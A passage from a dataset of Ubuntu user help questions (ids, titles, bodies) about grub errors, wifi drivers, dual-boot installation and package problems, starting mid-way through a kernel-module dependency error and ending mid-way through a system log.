compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_module ) = 1a1be7ca7e424d61 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_base_class ) = 47d4e4c883e5768a is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : mm_page_alloc ) = c5519693898c1b7d is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_base_firmware_class ) = b45d347646d81365 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_kernel_cpu_common ) = f95ddd6e1fd9a3a9 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_bitmap ) = 1bd5f25878fbbd41 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_nlattr ) = 529cc655f1e7cb0f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_rcutree ) = bb9ce712db2a1247 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_ethernet_eth ) = f0052a7e79cfb389 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_spinlock ) = 54d2f29207dc84d4 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : mm_util ) = 87b870696bd946a8 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_kstrtox ) = 034a3b5e05139c6b is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : fs_libfs ) = f0b1c210f265c4b8 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_cpufreq_cpufreq ) = 98e43c7e6e0bf525 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_sched_sch_generic ) = 7ebf9445c2a9562e is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_net_namespace ) = 09b981bb29cc6832 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_kernel_dumpstack ) = a6ccb5f9b8651813 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_rtnetlink ) = 6d93be7d903dfe67 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_time_timeconv ) = d7ab18dec8708e3e is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_ethtool ) = 8d72f2e74e705782 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_hweight ) = bcebe8a0a35459e5 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_kernel_setup_percpu ) = 68fcc0b9a0426d7c is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_cpu ) = 9932da9563d69df3 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_kernel_paravirt ) = e18b6d3e391bb3a7 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_kernel_pci-dma ) = 39602161ca86da91 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_char_random ) = 0262f5133940a8f2 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_char_random ) = 50836c34780c0a80 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_average ) = f461d0958cf71090 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_time_jiffies ) = 0a1119a9d9ca3d67 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : init_version ) = 709715dc4211746f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_netlink_af_netlink ) = d5fecffcb0f58ba0 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_net-sysfs ) = 1cc96ab51c9777ba is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_crc32 ) = 6e9f350eb5653657 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_trace_ring_buffer ) = 902b3755845aae05 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_pm_qos_params ) = eddb8decb45ca697 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : mm_vmalloc ) = 41dfc9e9d66898e4 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_wireless_wext-core ) = d0b9cb18f6ead6f0 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_pci_pci-driver ) = 1df4902b5c07dc68 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_trace_trace_output ) = 88ee20e758d180d8 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_wait ) = a8a7455479775eed is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_base_platform ) = f93c84b7405e2a6b is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_base_power_wakeup ) = ab6ff85c3490f602 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : crypto_crypto ) = b0dc52db68269f25 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : mm_swap ) = 3566fc0a1d81aa2f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_irq_manage ) = c8818359533a42b6 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : lib_kasprintf ) = 49add60e50526694 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_mm_physaddr ) = 8a91ed3165f0c415 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : drivers_pci_pcie_aspm ) = 5269f1f3e272a666 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_trace_trace_event_perf ) = 9a3d7aa188ebe8ca is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_kmod ) = 02095caf0cebb8fd is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : arch_x86_mm_ioremap ) = b24fb469fed14c09 is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : fs_open ) = 5f8a53146403dc8f is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : net_core_utils ) = 09d2ffb7a449920e is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 kernel ( default : kernel_smp ) = eebf1441195a9d6d is needed by compat-wireless-kmp-default-3.6_3.0.42_0.7-0.5.1.x86_64 is there anything i can do ?
456505	create desktop shortcut to log in as another user	i 'm trying to create a desktop shortcut ( presumably to an executable script ? ) that will log into another specific user account on my system . i want to log in to this other user 's desktop gui , not open a terminal prompt as them .
456506	grub broken 'error : unknown partition '	so , here 's the story of this problem i have my work laptop dualbooted with windows7 and ubuntu 12.04 lts . i was doing preparations for a tutorial on opengl i wanted to do and i installed some packages , namely , libxmu-dev and libxi-dev . however , one of these changed like 20 packages that were largely the same but with xorg-* instead of xserver-* prefixes . when i rebooted several peripherals did n't work . i mistakenly destroyed the partition that held ubuntu after making my backups but when i rebooted this message was lying in wait for me . error : unknown partition grub rescue : i tried using ls to move around the partitions but no matter what i do i always get the same message . error : unknown partition i even tried reinstalling ubuntu but the install process failed when it reached the grub configuration . what do i do ? ps : sorry if this is a common question , i read around the forums and everyone could read and modify their partitions on first try , not my case however .
456509	how do i get my applications back after using the * command deletes them all ?	i used this command `` sudo apt-get purge bluez* bluetooth '' to get rid of bluetooth but i realized that the * command is dangerous and will get rid of all the other applications and programs and now i am missing whole lot of programs on the sidebar and can no longer access them . how can i get them back ?
456510	ubuntu does not recognise dvd-r and dvd+r	someone gave me some dvds where he burnt some videos on them by himself . my ubuntu installation does them not recognize at all . `` normal '' commercial dvds i am able to play . i have no real clue where to start . how can i find out what is on the dvd ? what may i miss ? i installed the ubuntu-extras and run css.sh . and as said , most dvds work ... i found out that the dvds are not finalized i tried to get the data by using `` dd '' , `` ddrescue '' , `` dvdisaster '' ... nothing worked ! any suggestions ?
456515	epson nx-420 printer ok - until upgraded to ubuntu 14.04	thinking i ordered a bunch of junk ink from ebay but when i use printer on windows xp - it prints all the colors . when print in ubunut , yellow does not print , and the color registration is screwed up . tried in rgb and cmyk - nfg
456517	videos only showing a green screen despite having drivers installed	i 've been watching a lot of movies offline recently and they 've been playing smoothly for the last couple days , but today when i tried to watch one , it only showed a green screen and the audio was still playing . i 've taken a look at other answers , one of them saying i should install my graphics card driver , but it 's already installed . another one suggesting that sudo apt-get install ubuntu-restricted-extras would fix it , but that did n't fix it either . i also tried installing vlc and playing the videos on that , which did n't work . then , i tried disabling accelerated graphics in vlc but that just crashed the program when i tried to watch a video . also , videos online work fine . i 'm running ubuntu 12.04 lts .
456522	install java 6 for a single project while leaving the default for the rest of the system at java 7	in order to install a development environment for an older version of android , i need to have java 6 installed . i already , however , have oracle java 7 installed on my system and would like to keep it that way . how can i install java 6 so that the java and javac commands will refer to it in a given directory ( and its sub-directories , ) without messing anything up with respect to java 7 on the rest of my system ?
456527	maximum terminal resolution in ubuntu server virtual box guest	i have a vm machine running ubuntu 14.04 ( guest ) on a win7 host . i currently have the resolution of the server set to 1024*768 by adding this grub_cmdline_linux_default= '' splash xvga=1024x768x24 '' grub_gfxmode=1024x768x24 to /etc/default/grub . however i can not get higher resolutions . when i set for example 1200*800 it resets to 640*480 . i have allocated 128mb video memory . can i get to higher resolutions ?
456529	how can i share my scanner over the network ?	i have a brother mfc-295cn all-in-one printer/scanner/copier . is it possible to share the scanner to all of the devices on the network ( which include laptops running windows and linux ) ? if so , how ?
456530	ubuntu server 14.04 and 12.04 installation problem	i have used ubuntu server 12.04 from an usb-drive on my nas for some time but it got damaged so i bought an ssd-drive to replace it . i waited for the ubuntu 14.04 release and installed that , installation went through but it wo n't start , it loads for some time and then get stuck at : ext4-fs ( sdg1 ) : mounted filesystem without journal . opts : ( null ) . i then made a new usb with ubuntu server 12.04.4 to install that again , but when i choose `` install ubuntu server '' from the grub-menu the system just reboots . same thing if i choose `` check disc '' . i then thought the usb-drive maybe was faulty . so i got a new one and tried with that , same thing . the system i have is asus e45m1-i deluxe amd fusion e-450 mini-itx . what can i do to make a successful install of ubuntu ?
456531	debugging graphic errors	i have got a graphic problem , but i do n't have a clue how to find the source of it . it seems like some parts of the display wo n't refresh when i am moving a window . it also has to be some software error , as it is shown on the screen shot below . screen shot of the error . the computer is a modified version of the dell vostro 3450 . it uses the intel hd graphics of the built-in intel i5 . ( some more information : 16 gb ram , 500 gb hdd and 128 gb ssd . ) i 'm running the 12.04 lts . here the output of the requested command : lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) -- it also seems to be a unity problem . i switched to gnome classic and it runs fine . also this problem occured just two days ago.i did n't use the laptop for about a week , started it 2 days ago ( usually its always in standby-mode , but it may have run out of power ) and then recognized the error . after that i installed all updates , but the error is still there . -- okay , its gone . i ran ubuntu-tweek 's janitor , which basically clears/removes the apt-cache , old kernels , package configuration and unneeded packages . then i restarted unity and it looks all good .
456532	no longer able to create live usb	i 've tried all of the suggestions i could find from forums and q & a sites ( like this one ) , but i am still not able to live boot ubuntu 14.04 from usb . i am using a sandisk cruzer 32gb . i have tried : reformatting as fat32 wiping and rebuilding the mbr using several different tools including unetbootin and the built-in live usb creator checking boot flags recreating the partition table yes , my bios recognizes the drive . yes , this drive can be booted from . i have made a bootable usb drive at least 20 times in the past with the same drive without a problem . any ideas ?
456534	chrome tab font is some fallback font	in kubuntu tahr i installed chrome from the official .deb package . all works except that tab titles are written in ugly font that seems to be some sort of fallback . i have set 'fc-match ' to resolve family names like 'serif ' to ubuntu fonts , but it did n't help . do somebody know the name , by which chrome selects the font for tab titles ? i could override it then . or some other solution ?
456535	what does unmounting partitions do ?	okay , so i tried to install ubuntu 14.04 lts once . it did n't have an option to `` install ubuntu alongside windows 8 '' and the advanced partitioner had no option to make a new partition . i then disabled fast boot and tried again . this time , it asked me if i wanted to unmount partitions in use , showing `` /dev/sda '' as the partition in question . apparently this is in fact the hard drive . choosing `` no '' just leaves me with the same problem as before . i am extremely hesitant to press `` yes '' . it is fundamental to me that windows 8.1 ( side note : it was an upgrade from the preinstalled windows 7 ) is kept , and even more so the files within it . what exactly does unmounting do ? should i press yes ? if i should n't , what else can i do ? please note that this is my first time installing any operating system apart from ubuntu 12.04 once with wubi and windows 7 as well as my windows 8 install .
456536	help ! ! ! can not boot any version after 10.04	my motherboard is asrock b75m r2.0 . last time i used ubuntu 12.04 , but after jacking a broken hdd in my pc , ubuntu stopped booting . now no version after ubuntu 10.04 boots in my pc . i 've tried ( almost ) every possible way to boot but failed . now i 'm using windows 7 . please help me to get back in to my beloved ubuntu . i 've got blackscreen problem . after booting started a white dash ( - ) start beeping in the left top corner . then it gets smaller ( i think probably after detecting my gpu ) and after few seconds of that screen freezes . sometime even my restart button dont work . i tried booting from pendrive and dvd , but the result is same . i tried live booting , direct installing , installing using wubi . but same result
456541	installation question for a windows xp machine	i 'm attempting to install ubuntu 14.04 lts on a machine with windows xp , and i was hoping to install it beside windows and not wipe the whole hard drive clean . i read the installation instructions on the site . i loaded ubuntu from a thumb drive . on load , i clicked the option to install , but when i get to the part of the instructions where i would expect it to let me choose to install ubuntu alongside windows , the option is n't there . i only get an option to erase the hard drive and start a fresh install , or `` something else '' . does anyone know what i can do here ? thanks for any help for a new ubuntu user .
456545	wifi is not working in dell vostro 2420 after reinstalling ubuntu 12.04	i have a dell vostro 2420 pre-installed with ubuntu , now re-installed manually , but wifi stopped working , i tried some of the methods shown in other threads for similar problems . one of the method i tried is as per this thread : wireless not at all working , but wifi is still not working : if i do `ifconfig` it shows the following eth0 link encap : ethernet hwaddr inet addr:192.168.1.6 bcast:192.168.l1.255 mask:255.255.255.0 inet6 addr : fe80 : :e2db:55ff : feaa:6a25/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3341 errors:0 dropped:0 overruns:0 frame:0 tx packets:3685 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2658691 ( 2.6 mb ) tx bytes:531140 ( 531.1 kb ) interrupt:41 base address:0xc000 eth1 link encap : ethernet hwaddr inet6 addr : fe80 : :9e2a:70ff : fed9 : c6e9/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:3114 tx packets:0 errors:11 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:927 errors:0 dropped:0 overruns:0 frame:0 tx packets:927 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:86581 ( 86.5 kb ) tx bytes:86581 ( 86.5 kb ) and the following command shows : $ rfkill` list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : dell-wifi : wireless lan soft blocked : no hard blocked : no 3 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no i have n't got a clue about how to bring up the wifi . i 'm awaiting a favorable solution so that i can connect to wifi without hassles .
456551	can not load windows 8 following ubuntu 14.04 installation	this may be a duplicate of question that another user has posted , but unfortunately when i try to access the question i get a message stating that the original question was removed for moderation reasons . i previously had a working ubuntu 12.10 installation that dual booted with windows 8 , although i had to run the recommended boot-repair setting to get ubuntu working . i installed ubuntu 14.04 from a dvd yesterday over my ubuntu 12.10 installation and have found that , despite there being a windows 8 entry in grub2 , only ubuntu will load . if i select the windows 8 entry grub reloads . i get a uefi menu if i press f10 after switching on the computer , but the windows entry loads grub . there may be an error message generated here , but it is only on screen for a fraction of a second and i 've not yet been able to capture it . i have tried rerunning boot-repair using the ubuntu 14.04 livedvd and the following commands : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sh -c `` sed -i 's/trusty/saucy/g ' /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list '' sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair i selected the 'recommended repair ' option and i got a warning about errors occurring and this link to share : http : //paste.ubuntu.com/7340206/ as before , ubuntu boots fine but i still can not load windows 8 either from grub or from the uefi menu . i do not believe that i have changed any bios settings since my successful ubuntu 12.10/windows 8 dual boot setup so i was expecting everything to work . my computer is a samsung series 3 np350v5c laptop and i have a recovery partition that i can access by holding f4 when turning on my computer . i do n't believe that i have any other windows utilities . i am happy to provide further logs and pictures of my bios settings if required . i have also posted in the boot-repair thread on the forums as well as emailing boot.repair @ gmail.com as advised by boot-repair . thank you in advance for any help that you can offer . edit : as requested here is the update-grub output : sudo update-grub generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found windows boot manager on /dev/sda2 @ /efi/microsoft/boot/bootmgfw.efi adding boot menu entry for efi firmware configuration done also , this might be related to https : //bugs.launchpad.net/ubuntu/+source/grub2/+bug/1308758
456552	`` unable to locate package cinnamon '' when trying to install cinnamon	i want to install cinnamon on ubuntu 14.04 , but i get an error `` unable to locate package cinnamon '' sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon e : unable to locate package cinnamon yes , i did try sudo apt-get update and it did n't work .
456561	unity 8 preview in 14.04 - will it break anything ?	i recently upgraded to 14.04 , and i love it . i also want to be able to try out the unity 8 desktop preview , but this is my main system and i 'd rather not mess it up . there does n't seem to be any fancy doohickies that you have to do to install it , just running sudo apt-get install unity8-desktop-section-mir , as mentioned here on omg ! ubuntu ! . i also noticed that several mir packages were installed during the upgrade to 14.04 . will i need to have anything installed , or does 14.04 come with the required packages ? so , i 'm taking it safe and asking here . does anyone know if installing unity 8 will break anything in 14.04 ? i do n't have any other des installed , so that should n't be an issue . edit : i was doing some research and found this page . it mentions building unity8 and running it from a folder download source create a parent folder to not pollute your setup . so that you can have different unity branches there ( trunk , wip etc ) would this be safer ?
456562	keyboard not working but mouse is working	i am using ubuntu 12.04 and i made an upgrade last time and asked me to reboot the laptop . after restarting the laptop , i realized that my keyboard is not working at all [ i am currently typing from on screen keyboard ] . i tried to do sudo update and also sudo upgrade . moreover , i tried to log in as guest to see if the keyboard is working ; however , it is still not working . is there solution to make the keyboard work again as it was before . thank you
456564	investigating raid-related issue that caused data loss while using liveusb	i recently tried to install ubuntu on one of my hard drives and something went seriously wrong , resulting in 400+ gb of data being lost . frustrated as i was , i 've decided to try to find out what happened and perhaps alert others to this issue . disks and partitions the hard drive setup and partitioning scheme i had prior to trying ubuntu is pictured here : partition v on disk 0 is a primary partition , while w , x and y are logical , located inside an extended partition . windows 8 pro x64 is installed on partition c. all partitions are ntfs formatted . disks 0 and 1 are the exact same model . they have been used in a raid configuration a couple of years back , but have since been reverted to regular configuration , serving as separate entities . bios settings are set to have them in ide mode ( can be configured as raid or acpi configuration , but is n't ) . the goal and the steps i took i wanted to install ubuntu on one of my partitions so to have a dual-boot configuration . still in windows environment , i moved data from partition v to others , leaving it empty . i did not format or delete this partition , so it was left in ntfs format . liveusb was created by following instructions on ubuntu website using pen drive linux and iso image downloaded from ubuntu website ( version 14.04 lts ) . after everything was ready , i rebooted from the usb and was prompted to either try or install ubuntu . after checking out the apps and getting a general feel of the system , i 've decided it 's time to install it , so i clicked on install ubuntu 14.04 lts shortcut on the desktop . note that i did not run any applications that are remotely connected to partitioning or raid configuring . the installer prompted me with a couple of screens . it then asked me whether i 'd like to replace windows , erase the drive altogether ( or similar , there were five options , i think ) . the last option was to configure partitioning manually , which i chose . first sign of problems and deletion of data the next screen prompted with the list of disk drives and partitions . i immediately noticed something is wrong with partition sizes and also noticed strange partition names ( having a word raid ) . of course , seeing this , i did not want to proceed any further . i 've taken my time to take pictures of the listing to have it as a reference and compare it to the configuration displayed in windows environment . this way , i would 've been able to try to figure out why ubuntu is not reading partitions correctly . after this , i exited the installer and rebooted into windows . note that i did not continue any further with the installation , nor clicked any other buttons . after the restart , i booted into windows . windows took particularly long time to boot up , working at the screen with the blue windows logo . upon logging in , i was able to see only disk 1 partitions in a file manager . inspecting disk management tool , i noticed that it was actually disk 0 that held s and t partitions now and that disk 1 is offline due to it having the exact same signature as disk 0 . further on , i tried disconnecting one disk at a time , only to find out that disk 0 's partitions and data themselves were now exact copies of disk 1 . since disk 1 was full at the time , disk 0 was completely rewritten , therefore irreversibly deleting complete set of data i had there . what went wrong ? after the loss of crucial data ( i did have backups of some of them , but not entirely ) and a long stare at the wall in front of me , i 'm still wondering what went wrong . i 'm aware that what 's done is done and can not be reverted , but i can not but ask myself what could possibly went wrong and why ( and how ) did ubuntu mark these partitions as raid . i can not be 100 % sure , but i think it 's windows who did the actual rewriting during a long boot after exiting the installer , but it was certainly led to do so by ubuntu forcing disk drives to become raid configured . and how is this even possible when raid mode is not configured in bios ? note that my windows-based pc has been running happily for 6 years without problems before this . any help and insight into this would be appreciated . i 'm posting this mainly to try to come up with a sensible solution and also to warn people that there is something seriously wrong with the installer ( or live distribution perhaps ) , a bug that must not be left unattended .
456566	issue with asus pce-ac66 pcie wlan wifi card on ubuntu gnome 14.04	i am using ubuntu gnome 14.04 with asus pce-ac66 pcie wlan wifi card . i read quite a lot about this issue meanwhile , but nothing really helped me . first , i checked on dmesg if any events are fired around the card , but i only see it registered . [ 3.516666 ] wlan0 : broadcom bcm43a0 802.11 hybrid wireless controller 6.30.223.141 ( r415941 ) next , i checked mod . it 's loaded and everything looks ok : module size used by pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 27613 0 vboxdrv 339502 3 vboxnetadp , vboxnetflt , vboxpci ipt_masquerade 12880 3 iptable_nat 13011 1 nf_nat_ipv4 13263 1 iptable_nat nf_nat 21798 3 ipt_masquerade , nf_nat_ipv4 , iptable_nat nf_conntrack_ipv4 15012 2 nf_defrag_ipv4 12758 1 nf_conntrack_ipv4 xt_conntrack 12760 1 nf_conntrack 96976 6 ipt_masquerade , nf_nat , nf_nat_ipv4 , xt_conntrack , iptable_nat , nf_conntrack_ipv4 ipt_reject 12541 2 xt_checksum 12549 1 iptable_mangle 12695 1 xt_tcpudp 12884 6 bridge 110754 0 stp 12976 1 bridge llc 14552 2 stp , bridge ip6table_filter 12815 0 ip6_tables 27025 1 ip6table_filter iptable_filter 12810 1 ip_tables 27239 3 iptable_filter , iptable_mangle , iptable_nat ebtable_nat 12807 0 ebtables 30913 1 ebtable_nat x_tables 34059 11 ip6table_filter , xt_checksum , ip_tables , xt_tcpudp , ipt_masquerade , xt_conntrack , iptable_filter , ebtables , ipt_reject , iptable_mangle , ip6_tables michael_mic 12612 4 arc4 12608 2 rfcomm 69160 8 bnep 19624 2 dm_crypt 23177 0 binfmt_misc 17468 1 snd_hda_codec_hdmi 46207 1 nls_iso8859_1 12713 1 mxm_wmi 13021 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core rndis_host 14503 0 cdc_ether 14351 1 rndis_host joydev 17381 0 usbnet 43877 2 rndis_host , cdc_ether mii 13934 1 usbnet xpad 18218 0 ff_memless 13573 1 xpad snd_usb_audio 153411 2 snd_usbmidi_lib 29215 1 snd_usb_audio x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 btusb 32412 0 aesni_intel 55624 936459 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel dm_multipath 22873 0 gf128mul 14951 1 lrw scsi_dh 14882 1 dm_multipath glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 468232 ghash_clmulni_intel , aesni_intel , ablk_helper psmouse 102222 0 lib80211_crypt_tkip 17619 0 serio_raw 13462 0 bluetooth 395423 22 bnep , btusb , rfcomm wl 4207846 0 snd_hda_codec_realtek 61438 1 snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi lib80211 14381 2 wl , lib80211_crypt_tkip cfg80211 484040 1 wl snd_rawmidi 30144 2 snd_usbmidi_lib , snd_seq_midi snd_hda_intel 52355 7 snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_hwdep 13602 2 snd_usb_audio , snd_hda_codec wmi 19177 1 mxm_wmi snd_pcm 102099 5 snd_usb_audio , snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel parport_pc 32701 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel ppdev 17671 0 nvidia 10675249 50 snd_timer 29482 2 snd_pcm , snd_seq lpc_ich 21080 0 mei_me 18627 0 snd 69238 30 snd_hda_codec_realtek , snd_usb_audio , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi mei 82274 1 mei_me drm 302817 2 nvidia lp 17759 0 parport 42348 3 lp , ppdev , parport_pc intel_smartconnect 12619 0 soundcore 12680 1 snd mac_hid 13205 0 hid_logitech_dj 18581 0 hid_generic 12548 0 usbhid 52616 0 hid 106148 4 hid_generic , usbhid , hid_logitech_dj dm_mirror 22135 1 dm_region_hash 20862 1 dm_mirror dm_log 18411 3 dm_region_hash , dm_mirror e1000e 254433 0 ahci 25819 5 ptp 18933 1 e1000e libahci 32168 1 ahci pps_core 19382 1 ptp video 19476 0 my issue is : every now and then i loose my network connectivity . sometimes 5 times in a row and then it does not happen for 20 minutes . it is really weird and i do n't understand what 's happening . i also looked into system log and got these entries : apr 27 21:00:35 nightfurry kernel : [ 4225.865214 ] org.gnome.weath [ 12228 ] : segfault at 8 ip 00007f98bbfdc040 sp 00007fff8c8f1638 error 4 in libmozjs-24.so.0.0.0 [ 7f98bbe3e000+56f000 ] apr 27 21:00:26 nightfurry wpa_supplicant [ 1728 ] : message repeated 6 times : [ wlan0 : ctrl-event-scan-started ] apr 27 21:00:45 nightfurry wpa_supplicant [ 1728 ] : wlan0 : wpa : group rekeying completed with 9c : c7 : a6:94:8c:72 [ gtk=tkip ] apr 27 21:00:47 nightfurry kernel : [ 4237.403813 ] error @ wl_notify_scan_status : wlan0 scan_results error ( -22 ) apr 27 21:00:51 nightfurry wpa_supplicant [ 1728 ] : message repeated 6 times : [ wlan0 : wpa : group rekeying completed with 9c : c7 : a6:94:8c:72 [ gtk=tkip ] ] apr 27 21:00:51 nightfurry wpa_supplicant [ 1728 ] : wlan0 : ctrl-event-disconnected bssid=9c : c7 : a6:94:8c:72 reason=0 apr 27 21:00:51 nightfurry kernel : [ 4242.061514 ] cfg80211 : calling crda to update world regulatory domain apr 27 21:00:52 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected apr 27 21:00:52 nightfurry kernel : [ 4242.079848 ] cfg80211 : world regulatory domain updated : apr 27 21:00:52 nightfurry kernel : [ 4242.079850 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 27 21:00:52 nightfurry kernel : [ 4242.079851 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:00:52 nightfurry kernel : [ 4242.079852 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:00:52 nightfurry kernel : [ 4242.079853 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:00:52 nightfurry kernel : [ 4242.079853 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:00:52 nightfurry kernel : [ 4242.079854 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 